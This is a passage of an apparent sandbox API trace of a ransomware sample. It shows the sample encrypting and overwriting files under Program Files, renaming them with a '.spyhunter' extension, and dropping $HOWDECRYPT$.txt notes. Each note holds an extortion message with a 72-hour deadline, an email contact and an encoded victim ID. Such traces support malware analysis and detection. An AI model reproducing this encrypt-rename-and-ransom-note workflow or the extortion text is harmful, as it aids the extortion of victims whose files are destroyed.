shared\\vba\\vba7\\1033\\vbob6.chm.spyhunter")) returned 1 [0091.484] GetProcessHeap () returned 0x2c0000 [0091.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0091.484] GetProcessHeap () returned 0x2c0000 [0091.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0091.484] GetProcessHeap () returned 0x2c0000 [0091.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346c68 | out: hHeap=0x2c0000) returned 1 [0091.484] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd08 | out: pbBuffer=0x270fd08) returned 1 [0091.484] GetProcessHeap () returned 0x2c0000 [0091.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0091.484] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x270fd00*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x270fd00*=0x30) returned 1 [0091.484] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTMTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whtmtxt.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0091.485] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTMTXT.SHX") returned 81 [0091.485] StrStrW (lpFirst="WHTMTXT.SHX", lpSrch=".txt") returned 0x0 [0091.485] GetProcessHeap () returned 0x2c0000 [0091.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x347830 [0091.485] ReadFile (in: hFile=0xcc, lpBuffer=0x347830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fcc4, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesRead=0x270fcc4*=0x2800, lpOverlapped=0x0) returned 1 [0091.536] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.536] WriteFile (in: hFile=0xcc, lpBuffer=0x347830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fcc4, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesWritten=0x270fcc4*=0x2800, lpOverlapped=0x0) returned 1 [0091.536] GetProcessHeap () returned 0x2c0000 [0091.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347830 | out: hHeap=0x2c0000) returned 1 [0091.536] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.536] WriteFile (in: hFile=0xcc, lpBuffer=0x270fd04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fcc4, lpOverlapped=0x0 | out: lpBuffer=0x270fd04*, lpNumberOfBytesWritten=0x270fcc4*=0x4, lpOverlapped=0x0) returned 1 [0091.586] WriteFile (in: hFile=0xcc, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fcc4, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x270fcc4*=0x30, lpOverlapped=0x0) returned 1 [0091.586] CloseHandle (hObject=0xcc) returned 1 [0091.750] GetProcessHeap () returned 0x2c0000 [0091.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.750] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTMTXT.SHX.spyhunter") returned 91 [0091.750] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTMTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whtmtxt.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTMTXT.SHX.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whtmtxt.shx.spyhunter")) returned 1 [0091.751] GetProcessHeap () returned 0x2c0000 [0091.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0091.751] GetProcessHeap () returned 0x2c0000 [0091.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0091.751] GetProcessHeap () returned 0x2c0000 [0091.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f238 | out: hHeap=0x2c0000) returned 1 [0091.751] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd08 | out: pbBuffer=0x270fd08) returned 1 [0091.751] GetProcessHeap () returned 0x2c0000 [0091.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0091.751] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x270fd00*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x270fd00*=0x30) returned 1 [0091.751] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadox28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.759] GetProcessHeap () returned 0x2c0000 [0091.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0091.759] GetProcessHeap () returned 0x2c0000 [0091.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34d298 | out: hHeap=0x2c0000) returned 1 [0091.759] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd00 | out: pbBuffer=0x270fd00) returned 1 [0091.759] GetProcessHeap () returned 0x2c0000 [0091.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0091.759] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x270fcf8*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x270fcf8*=0x30) returned 1 [0091.759] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.763] GetProcessHeap () returned 0x2c0000 [0091.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0091.769] GetProcessHeap () returned 0x2c0000 [0091.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34cf98 | out: hHeap=0x2c0000) returned 1 [0091.769] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd00 | out: pbBuffer=0x270fd00) returned 1 [0091.769] GetProcessHeap () returned 0x2c0000 [0091.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0091.770] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fcf8*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fcf8*=0x30) returned 1 [0091.770] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.821] GetProcessHeap () returned 0x2c0000 [0091.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0091.821] GetProcessHeap () returned 0x2c0000 [0091.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358610 | out: hHeap=0x2c0000) returned 1 [0091.821] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fcf8 | out: pbBuffer=0x270fcf8) returned 1 [0091.821] GetProcessHeap () returned 0x2c0000 [0091.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0091.821] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fcf0*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fcf0*=0x30) returned 1 [0091.821] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui" (normalized: "c:\\program files\\common files\\system\\en-us\\wab32res.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.829] GetProcessHeap () returned 0x2c0000 [0091.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0091.829] GetProcessHeap () returned 0x2c0000 [0091.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d680 | out: hHeap=0x2c0000) returned 1 [0091.830] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fcf8 | out: pbBuffer=0x270fcf8) returned 1 [0091.830] GetProcessHeap () returned 0x2c0000 [0091.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0091.830] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fcf0*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fcf0*=0x30) returned 1 [0091.830] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\DirectDB.dll" (normalized: "c:\\program files\\common files\\system\\directdb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.861] GetProcessHeap () returned 0x2c0000 [0091.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0091.861] GetProcessHeap () returned 0x2c0000 [0091.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329dd8 | out: hHeap=0x2c0000) returned 1 [0091.861] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fcf0 | out: pbBuffer=0x270fcf0) returned 1 [0091.861] GetProcessHeap () returned 0x2c0000 [0091.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0091.861] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fce8*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fce8*=0x30) returned 1 [0091.861] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.895] GetProcessHeap () returned 0x2c0000 [0091.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0091.895] GetProcessHeap () returned 0x2c0000 [0091.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34c8d8 | out: hHeap=0x2c0000) returned 1 [0091.896] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0091.921] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.921] WriteFile (in: hFile=0x17c, lpBuffer=0x270fc23*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fd4c, lpOverlapped=0x0 | out: lpBuffer=0x270fc23*, lpNumberOfBytesWritten=0x270fd4c*=0x127, lpOverlapped=0x0) returned 1 [0091.922] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.922] WriteFile (in: hFile=0x17c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fd4c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fd4c*=0x2ac, lpOverlapped=0x0) returned 1 [0091.922] CloseHandle (hObject=0x17c) returned 1 [0091.923] GetProcessHeap () returned 0x2c0000 [0091.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x375928 | out: hHeap=0x2c0000) returned 1 [0091.923] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\system\\msadc\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0091.923] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.923] WriteFile (in: hFile=0x17c, lpBuffer=0x270fc1f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fd48, lpOverlapped=0x0 | out: lpBuffer=0x270fc1f*, lpNumberOfBytesWritten=0x270fd48*=0x127, lpOverlapped=0x0) returned 1 [0091.924] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.924] WriteFile (in: hFile=0x17c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fd48, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fd48*=0x2ac, lpOverlapped=0x0) returned 1 [0091.924] CloseHandle (hObject=0x17c) returned 1 [0091.925] GetProcessHeap () returned 0x2c0000 [0091.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d748 | out: hHeap=0x2c0000) returned 1 [0091.925] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fce8 | out: pbBuffer=0x270fce8) returned 1 [0091.925] GetProcessHeap () returned 0x2c0000 [0091.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x335d88 [0091.925] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x335d88*, pdwDataLen=0x270fce0*=0x20, dwBufLen=0x30 | out: pbData=0x335d88*, pdwDataLen=0x270fce0*=0x30) returned 1 [0091.925] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdfmap.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.926] GetProcessHeap () returned 0x2c0000 [0091.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x335d88 | out: hHeap=0x2c0000) returned 1 [0091.926] GetProcessHeap () returned 0x2c0000 [0091.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34d418 | out: hHeap=0x2c0000) returned 1 [0091.926] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fce0 | out: pbBuffer=0x270fce0) returned 1 [0091.926] GetProcessHeap () returned 0x2c0000 [0091.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x335d88 [0091.926] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x335d88*, pdwDataLen=0x270fcd8*=0x20, dwBufLen=0x30 | out: pbData=0x335d88*, pdwDataLen=0x270fcd8*=0x30) returned 1 [0091.926] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaremr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.927] GetProcessHeap () returned 0x2c0000 [0091.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x335d88 | out: hHeap=0x2c0000) returned 1 [0091.927] GetProcessHeap () returned 0x2c0000 [0091.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34d1d8 | out: hHeap=0x2c0000) returned 1 [0091.927] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fce0 | out: pbBuffer=0x270fce0) returned 1 [0091.927] GetProcessHeap () returned 0x2c0000 [0091.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x335d88 [0091.927] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x335d88*, pdwDataLen=0x270fcd8*=0x20, dwBufLen=0x30 | out: pbData=0x335d88*, pdwDataLen=0x270fcd8*=0x30) returned 1 [0091.927] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdarem.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.928] GetProcessHeap () returned 0x2c0000 [0091.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x335d88 | out: hHeap=0x2c0000) returned 1 [0091.928] GetProcessHeap () returned 0x2c0000 [0091.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34d118 | out: hHeap=0x2c0000) returned 1 [0091.928] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fcd8 | out: pbBuffer=0x270fcd8) returned 1 [0091.928] GetProcessHeap () returned 0x2c0000 [0091.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x335d88 [0091.928] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x335d88*, pdwDataLen=0x270fcd0*=0x20, dwBufLen=0x30 | out: pbData=0x335d88*, pdwDataLen=0x270fcd0*=0x30) returned 1 [0091.928] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprst.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.928] GetProcessHeap () returned 0x2c0000 [0091.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x335d88 | out: hHeap=0x2c0000) returned 1 [0091.928] GetProcessHeap () returned 0x2c0000 [0091.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34d298 | out: hHeap=0x2c0000) returned 1 [0091.928] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fcd8 | out: pbBuffer=0x270fcd8) returned 1 [0091.928] GetProcessHeap () returned 0x2c0000 [0091.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x335d88 [0091.928] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x335d88*, pdwDataLen=0x270fcd0*=0x20, dwBufLen=0x30 | out: pbData=0x335d88*, pdwDataLen=0x270fcd0*=0x30) returned 1 [0091.929] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprsr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.929] GetProcessHeap () returned 0x2c0000 [0091.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x335d88 | out: hHeap=0x2c0000) returned 1 [0091.929] GetProcessHeap () returned 0x2c0000 [0091.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34d358 | out: hHeap=0x2c0000) returned 1 [0091.929] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fcd0 | out: pbBuffer=0x270fcd0) returned 1 [0091.929] GetProcessHeap () returned 0x2c0000 [0091.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0091.929] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fcc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fcc8*=0x30) returned 1 [0091.929] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msaddsr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.930] GetProcessHeap () returned 0x2c0000 [0091.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0091.930] GetProcessHeap () returned 0x2c0000 [0091.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34ced8 | out: hHeap=0x2c0000) returned 1 [0091.930] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fcd0 | out: pbBuffer=0x270fcd0) returned 1 [0091.930] GetProcessHeap () returned 0x2c0000 [0091.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0091.930] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fcc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fcc8*=0x30) returned 1 [0091.930] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadds.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.930] GetProcessHeap () returned 0x2c0000 [0091.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0091.930] GetProcessHeap () returned 0x2c0000 [0091.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34ce18 | out: hHeap=0x2c0000) returned 1 [0091.931] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fcc8 | out: pbBuffer=0x270fcc8) returned 1 [0091.931] GetProcessHeap () returned 0x2c0000 [0091.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0091.931] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fcc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fcc0*=0x30) returned 1 [0091.931] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcs.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcs.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.931] GetProcessHeap () returned 0x2c0000 [0091.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0091.931] GetProcessHeap () returned 0x2c0000 [0091.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34cd58 | out: hHeap=0x2c0000) returned 1 [0091.931] CryptGenRandom (in: 